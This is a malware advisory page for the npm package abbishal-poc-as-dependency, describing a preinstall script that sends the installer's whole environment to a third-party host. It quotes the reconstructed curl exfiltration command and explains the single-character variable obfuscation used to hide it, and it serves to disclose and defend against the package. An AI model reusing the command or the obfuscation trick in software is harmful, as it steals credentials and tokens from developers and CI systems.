Logo
npm

abbishal-poc-as-dependency@1.3.1

Vulnerability report · Last retrieved from osv.dev October 8, 2026 at 11:44 AM UTC

Malicious

OSV ID

MAL-2026-17653

Ecosystem

npm

Summary

package.json declares a preinstall lifecycle script sh./test.sh. test.sh assembles a curl -d "$(env)" https://abbishal.com/sh/installation-success command by splitting the tokens curl, env, and -d across single-character shell variables (i=c, s=u, a=rl, t=en) and reconstructing them via variable concatenation and command substitution. On npm install this POSTs the entire output of env — the installer shell/CI's full process environment, including any exported secrets such as CI tokens, cloud credentials (AWS_*, GCP, Azure), and npm publish tokens — to a hardcoded third-party host. The README asserts that the package performs no network requests, no filesystem access, no data collection, and has no preinstall/postinstall lifecycle scripts, directly contradicting the shipped manifest and script. The variable-fragment obfuscation and the cover-story README indicate deliberate evasion rather than a legitimate placeholder or canary.

Source: amazon-inspector (bc0e1fb6fb8f481baf7c16b593aa342b3b63165f9e97e395ff49c4bed18dfa53)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.